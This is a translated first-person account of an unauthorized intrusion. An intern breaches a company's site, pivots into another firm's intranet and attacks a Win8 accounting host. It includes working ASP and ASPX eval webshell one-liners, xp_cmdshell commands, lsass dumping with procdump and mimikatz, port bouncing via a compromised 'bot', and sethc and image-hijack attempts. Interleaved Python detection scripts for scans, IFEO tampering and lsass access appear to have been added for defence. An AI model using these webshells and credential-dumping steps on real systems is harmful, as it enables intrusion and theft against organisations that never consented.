Record of an intrusion into a Win8 host

Source: Internet
Author: User

Here is the situation. I had been an intern at Company A for a while and wanted to penetrate Company A. I scanned with various tools and finally found an injection point and got the backend password. After logging in to the system there was nothing usable: the upload checks were very strict, and even though an image could be uploaded and viewed, its real path could not be determined. There was no neighbouring site on the same server either. Forget it; there is still the C segment (the /24 subnet), which leads to the story below.

Scanning with Yujian (御剑), wwwscan and various other scanners, and finally...

Company B's website source code; download it...

Obtain the backend password:

Log in to the backend, upload an image through the ckfinder editor, rename it to exploit the IIS 6.0 parsing vulnerability, and get a webshell.

Intranet host with no database on it; presumably the web server and the database are on separate machines.

672 patches installed. Presumably no system vulnerabilities are left. What now?

I am not fond of adding users directly; it is too noisy. Better to grab the passwords straight from memory with procdump. This is not a virus-style attack, so where other methods get intercepted by security software or fail to read the data, this usually succeeds.

Upload procdump, and then

After lsass.dmp is downloaded: a dump from Win2003 is decrypted on Win2003, a dump from 32-bit Win8 is decrypted on Win7, and a dump from 64-bit Win8 is decrypted on a 64-bit system. This method has never failed me, haha

On the Win2003 virtual machine

The password is nothing unusual. The IP address of this host is 192.168.0.1.

Because I can only do a two-way port bounce from the intranet,

find a previously compromised Internet host (bot) with the IP address 58.215.65.xxx and run the following command:

Run the following command on 192.168.0.1:

Then we can connect to the Internet bot:

OK, connected......!!!!!

 

Because it is an intranet, I used SuperScan to scan the ports through the forward; the network was a little slow. After all that forwarding, the results:

192.168.0.1: 80

192.168.0.1: 3389

192.168.0.1: 139

192.168.0.28: 80

192.168.0.28: 139

192.168.0.28: 3306

192.168.0.29: 139

192.168.0.43: 139

192.168.0.88: 139

192.168.0.90: 3389

192.168.0.119: 80

192.168.0.119: 139

192.168.0.119: 1433

192.168.0.141: 139

192.168.0.144: 139

192.168.0.150: 139

192.168.0.164: 139

192.168.0.198: 139

192.168.0.198: 1433

192.168.0.207: 139

192.168.0.207: 80

192.168.0.207: 8080

192.168.0.209: 8080

192.168.0.253: 80

192.168.0.253: 139

192.168.0.253: 1433

192.168.0.253: 3389

192.168.0.254: 8080
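The sweep whose results are listed above is exactly the pattern a defender can catch in connection logs: one internal source touching many distinct host:port pairs in a short time. The following is an added example written for this page, not code from the original write-up; the log line format, the `detect_sweeps` function and the sample lines are constructed for this example, with the sample targets taken from the list above.

```python
"""
Added example (not from the original write-up): spot the kind of intranet port
sweep whose results are listed above by looking at connection logs.
Log format and the sample lines below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log line shape: "<ISO timestamp> <src> -> <dst>:<port> <tcp flag>"
LINE_RE = re.compile(
    r"^(\S+)\s+(\d+(?:\.\d+){3})\s*->\s*(\d+(?:\.\d+){3}):(\d+)\s+(\w+)$"
)

def parse_line(line):
    """Return (timestamp, src, dst, port) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, dst, port, _flag = m.groups()
    return datetime.fromisoformat(ts), src, dst, int(port)

def detect_sweeps(lines, window=timedelta(seconds=60), min_targets=10):
    """
    Group connection attempts by source and slide a time window over them.
    A source that reaches >= min_targets distinct (host, port) pairs inside one
    window is reported together with the largest such target set.
    """
    per_src = defaultdict(list)
    for ts, src, dst, port in filter(None, map(parse_line, lines)):
        per_src[src].append((ts, dst, port))

    alerts = {}
    for src, attempts in per_src.items():
        attempts.sort()                      # order by timestamp
        start = 0
        for end in range(len(attempts)):
            # shrink the window from the left until it fits
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            targets = {(d, p) for _, d, p in attempts[start:end + 1]}
            if len(targets) >= min_targets and len(targets) > len(alerts.get(src, ())):
                alerts[src] = targets
    return alerts

# Constructed sample: one host touching (host, port) pairs from the scan above,
# plus a workstation with ordinary traffic to two servers.
SWEEP_TARGETS = [
    ("192.168.0.28", 80), ("192.168.0.28", 139), ("192.168.0.28", 3306),
    ("192.168.0.29", 139), ("192.168.0.43", 139), ("192.168.0.88", 139),
    ("192.168.0.90", 3389), ("192.168.0.119", 80), ("192.168.0.119", 139),
    ("192.168.0.119", 1433), ("192.168.0.253", 1433), ("192.168.0.253", 3389),
]
SAMPLE_LOG = [
    f"2014-05-01T10:00:{i:02d} 192.168.0.1 -> {dst}:{port} SYN"
    for i, (dst, port) in enumerate(SWEEP_TARGETS)
] + [
    "2014-05-01T10:00:03 192.168.0.50 -> 192.168.0.119:1433 SYN",
    "2014-05-01T10:00:09 192.168.0.50 -> 192.168.0.28:80 SYN",
    "2014-05-01T10:00:15 192.168.0.50 -> 192.168.0.119:1433 SYN",
]

if __name__ == "__main__":
    for src, targets in detect_sweeps(SAMPLE_LOG).items():
        print(f"{src}: {len(targets)} distinct host:port pairs in one window")
```

The threshold and window are the tuning knobs: a workstation that repeatedly talks to the same two servers never accumulates distinct pairs, while a scanner that walks a /24 on port 139 crosses the threshold within seconds. Running this over firewall or NetFlow exports from the intranet segment would have surfaced the compromised 192.168.0.1 as soon as the sweep began.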

When I saw that 253 had port 1433 open, I tried it.

Good guy, what luck. First the machine information: IP 192.168.0.253, x86 Win8.

But only some irrelevant commands could be executed...

Probably being intercepted. Check the processes.

360 was doing the blocking. The host runs Yonyou (UFIDA) U8 software; there is a story behind that. Since adding users was not going to work, try other approaches:

1. Replace sethc.exe
2. (screenshot not preserved)
3. Rejected
4. (screenshot not preserved)
5. Modify the security attributes: after a long wait, the system still does not respond. Looks like it will only work once 360 is dealt with.
6. (screenshot not preserved)

What now? Try image hijacking. As expected.....

Still no way in. Since it is on the LAN, I can first establish an IPC connection to transfer files, copy the dump file out, and then recover the username and password. Just do it..

Failed again; this penetration has been tortuous. What to do, especially on Win8? If the website route is unavailable, write a one-line webshell, pass procdump through it and execute it, then download the dump file.....
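Both tricks tried above, replacing sethc.exe and image hijacking, leave artifacts a defender can check for: a Debugger value under the Image File Execution Options key for an accessibility binary, and a system binary whose hash no longer matches a known-good baseline. The following is an added example written for this page, not code from the original write-up; the `.reg` export, the file contents and the "known-good" hash are all constructed (the hash is computed from a constructed stand-in, not from a real sethc.exe), and `find_ifeo_debuggers` / `find_replaced_binaries` are names chosen here.

```python
"""
Added example (not from the original write-up): defender-side checks for the two
Win8 tricks tried above, replacing sethc.exe and image hijacking. The .reg
export and the file contents below are constructed for this example; the known-
good hash is computed from the constructed stand-in, not from a real sethc.exe.
"""
import hashlib
import re

IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options" + "\\")
# Accessibility binaries reachable from the logon screen; a Debugger value on any
# of these launches another program before a user has authenticated.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
KEY_RE = re.compile(r"^\[(.+)\]$")
DEBUGGER_RE = re.compile(r'^"Debugger"="(.*)"$', re.I)

def find_ifeo_debuggers(reg_text):
    """Parse a .reg export and return [(binary, debugger_path, severity)]."""
    findings = []
    current_key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        dbg = DEBUGGER_RE.match(line)
        if dbg and current_key and current_key.lower().startswith(IFEO_PREFIX.lower()):
            binary = current_key[len(IFEO_PREFIX):].lower()
            severity = "high" if binary in ACCESSIBILITY_BINARIES else "medium"
            # .reg files double every backslash; undo that for the report
            findings.append((binary, dbg.group(1).replace("\\\\", "\\"), severity))
    return findings

def find_replaced_binaries(files, baseline):
    """
    files: {name: bytes} as read from System32; baseline: {name: sha256 hex of
    the known-good file}. Return the names whose hash does not match.
    """
    return sorted(
        name for name, data in files.items()
        if name in baseline and hashlib.sha256(data).hexdigest() != baseline[name]
    )

# ---- constructed sample data -------------------------------------------------
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"DisableExceptionChainValidation"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\tmp\\not-a-debugger.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\someapp.exe]
"Debugger"="C:\\Tools\\debugger-placeholder.exe"
'''

GOOD_SETHC = b"constructed stand-in for the genuine sethc.exe bytes"
GOOD_UTILMAN = b"constructed stand-in for utilman.exe"
BASELINE = {
    "sethc.exe": hashlib.sha256(GOOD_SETHC).hexdigest(),
    "utilman.exe": hashlib.sha256(GOOD_UTILMAN).hexdigest(),
}
SAMPLE_FILES = {
    "sethc.exe": b"constructed stand-in for a swapped-in binary",  # tampered
    "utilman.exe": GOOD_UTILMAN,                                    # untouched
}

if __name__ == "__main__":
    for binary, dbg, sev in find_ifeo_debuggers(SAMPLE_REG):
        print(f"[{sev}] IFEO Debugger on {binary}: {dbg}")
    for name in find_replaced_binaries(SAMPLE_FILES, BASELINE):
        print(f"[high] {name} does not match its known-good hash")
```

On a live host the `.reg` text comes from `reg export` of the Image File Execution Options key, and the baseline hashes from a clean build of the same Windows version; `sfc /verifyonly` performs the file-integrity half natively. A Sysmon registry value-set event (Event ID 13) scoped to that key turns the same check into a real-time alert rather than a periodic sweep.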

Port 80 is open. Find the web root.

No other way: I wrote a file into c:\inetpub\wwwroot\.

Exec master.dbo.xp_cmdshell 'echo 1> c:\inetpub\wwwroot\1.txt', then check it from the bot at 192.168.0.1 (the site cannot be reached from the Internet). If that succeeds, the root directory is c:\inetpub\wwwroot\. Write a one-liner...

echo hello ^<% eval request("a") %^> > c:\inetpub\wwwroot\12.asp, then access it..

Infuriating???

Try writing an ASPX Chopper shell instead.

echo ^<%@ Page Language="Jscript" validateRequest="false" %^>^<% Response.Write(eval(Request.Item["w"], "unsafe")); %^> > c:\inetpub\wwwroot\1.aspx

The Chopper shell connects successfully.

However, Chopper could only read things and could not upload files. I thought this was a problem with the shell and that I should upload a bigger webshell, but that upload failed. I did not keep looking for writable directories; that was a mistake.

Suddenly I thought of trying weak passwords on those accounts..

The show begins...................

Apart from the complex administrator password, the other accounts' passwords are all the same as the account names, but after I log in

it gets stuck here, and the usciio account never completes no matter how long I wait... I replayed it in slow motion.

No weak password there. Also, I am not familiar with UFIDA software. Any help is welcome.

Click Print...

Click Find Printer....

From the address bar or elsewhere we can invoke various commands.

But only with the permissions of this user.

UAC is also on, and the functionality is limited, but that does not prevent us from writing a trojan (webshell). Find a writable directory and write the trojan there; then the database's SYSTEM privileges can be used to move the trojan to the website root.

The next step is to find a writable directory through the trojan, upload procdump to the server, and run it under the database's SYSTEM privileges to generate the lsass.dmp file; then download lsass.dmp to the local machine and decrypt it with mimikatz. Since the target is a 32-bit Win8 host, it can be decrypted on 32-bit Win7.
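The procdump, lsass.dmp, offline-mimikatz chain is used twice in this write-up, first on the Win2003 VM and again here on the 32-bit Win8 host, and each step leaves telemetry: a process opening lsass.exe with memory-read rights, a command line naming lsass, and a .dmp file appearing on disk. The following is an added example written for this page, not code from the original write-up; the event dictionaries follow Sysmon field names, and the allowlist, the `scan_events` helper and all sample events and paths are constructed for this example.

```python
"""
Added example (not from the original write-up): detection logic for the
procdump -> lsass.dmp -> offline mimikatz chain used above. Event shapes follow
Sysmon field names; all sample events and paths are constructed for this example.
"""

# Windows process access right that allows reading another process's memory.
PROCESS_VM_READ = 0x0010

# Processes that routinely open lsass.exe with read access on a default install.
# Assumption: tune this allowlist per environment (EDR, backup agents, etc.).
ALLOWED_SOURCES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
}

def _is_lsass(path):
    return path.lower().endswith(r"\lsass.exe")

def check_process_access(ev):
    """Sysmon Event ID 10: handle to lsass.exe with memory-read rights from an unexpected process."""
    if ev.get("EventID") != 10 or not _is_lsass(ev.get("TargetImage", "")):
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    src = ev.get("SourceImage", "").lower()
    if granted & PROCESS_VM_READ and src not in ALLOWED_SOURCES:
        return f"lsass memory read by {src} (GrantedAccess=0x{granted:X})"
    return None

def check_process_create(ev):
    """Sysmon Event ID 1: a new process whose command line names lsass, from an unexpected image."""
    if ev.get("EventID") != 1:
        return None
    cmd = ev.get("CommandLine", "").lower()
    image = ev.get("Image", "").lower()
    if "lsass" in cmd and image not in ALLOWED_SOURCES and not _is_lsass(image):
        return f"process launched with lsass on its command line: {ev['CommandLine']}"
    return None

def check_file_create(ev):
    """Sysmon Event ID 11: a minidump file whose name refers to lsass."""
    if ev.get("EventID") != 11:
        return None
    target = ev.get("TargetFilename", "").lower()
    if target.endswith(".dmp") and "lsass" in target:
        return f"lsass dump written to {ev['TargetFilename']}"
    return None

CHECKS = (check_process_access, check_process_create, check_file_create)

def scan_events(events):
    """Run every check over every event; return the list of alert strings."""
    alerts = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts

# Constructed sample telemetry: a dump tool dropped under the web root reads lsass
# and writes lsass.dmp, alongside normal svchost and notepad activity.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\inetpub\tmp\procdump.exe",
     "CommandLine": r"procdump.exe [options] lsass.exe lsass.dmp"},
    {"EventID": 10, "SourceImage": r"C:\inetpub\tmp\procdump.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 11, "Image": r"C:\inetpub\tmp\procdump.exe",
     "TargetFilename": r"C:\inetpub\tmp\lsass.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\system32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

Event ID 10 only appears if the Sysmon configuration includes lsass.exe as a ProcessAccess target, so that filter is the first thing to verify. The write-up's observation that this technique "is not a virus attack" is exactly why signature-based AV let it through; LSA protection (RunAsPPL) and Credential Guard attack the technique itself by refusing the handle or by keeping the secrets out of the dumped memory, and the allowlist above is what keeps the handle-based alert from firing on legitimate system processes.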

Sorry the password is so small in the screenshot, but now I am properly logged into the backend to see why users cannot be added. There are more twists here: during the administrator's login, the user's logon window is still blocked. As long as you follow the method above, bring up Task Manager, and then click "Connect" to log on. The button is greyed out because I am already logged on at this position. Next I will add another user to see what is doing the intercepting....

It really is the ghost of 360. The penetration of this machine ends here.

How to break through 360's interception remains a long-standing problem, but this still counts as a success because some commands could be executed.

Looking for an answer to this.

QQ: 1563689034
